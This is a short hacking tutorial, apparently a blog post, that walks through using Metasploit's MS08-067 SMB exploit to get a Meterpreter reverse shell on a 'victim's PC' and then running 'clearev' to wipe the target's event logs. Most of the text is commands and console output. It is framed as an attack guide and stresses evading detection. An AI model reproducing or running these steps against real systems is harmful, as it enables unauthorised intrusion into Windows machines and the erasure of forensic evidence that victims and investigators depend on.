Cover Yourself

Follow this steps, to cover yourself after you leaving the victim’s PC

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now, Set The Local Host – hacker’s local ip address*
msf exploit (ms_08_067_netapi) > set LHOST
*The output will be: LHOST =>*

*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_08_067_netapi) > set RHOST
*The output will be: RHOST =>*

*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the who details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-10.11 14:20:19 +0300

meterpreter >

To cover yoursekf on the remote PC, type:
meterpreter > clearev
*Now, the event viewer on the target had been deleted*
*This command is acutally the most important thing, this command can actually save you as a Hacker*




Here is an example by Gamer Forever